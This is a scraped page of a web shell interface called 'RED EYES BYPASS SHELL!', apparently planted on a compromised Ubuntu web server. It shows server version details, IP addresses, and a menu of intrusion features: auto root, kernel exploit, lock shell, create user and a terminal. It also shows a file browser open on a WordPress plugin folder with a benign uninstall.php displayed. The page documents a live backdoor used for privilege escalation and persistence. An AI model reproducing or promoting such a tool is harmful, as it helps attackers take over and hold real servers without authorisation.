Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
plugins /
google-site-kit /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
dist
[ DIR ]
drwxr-xr-x
gtg
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
third-party
[ DIR ]
drwxr-xr-x
google-site-kit.php
3.67
KB
-rwxr-xr-x
readme.txt
11.05
KB
-rwxr-xr-x
uninstall.php
559
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : uninstall.php
<?php /** * Uninstallation script for the plugin. * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ // Prevent execution from directly accessing the file. if ( ! defined( 'WP_UNINSTALL_PLUGIN' ) ) { exit; } // Load plugin main file to bootstrap infrastructure and add hooks. require_once __DIR__ . '/google-site-kit.php'; // Fire action to trigger uninstallation logic. do_action( 'googlesitekit_uninstallation' );
Close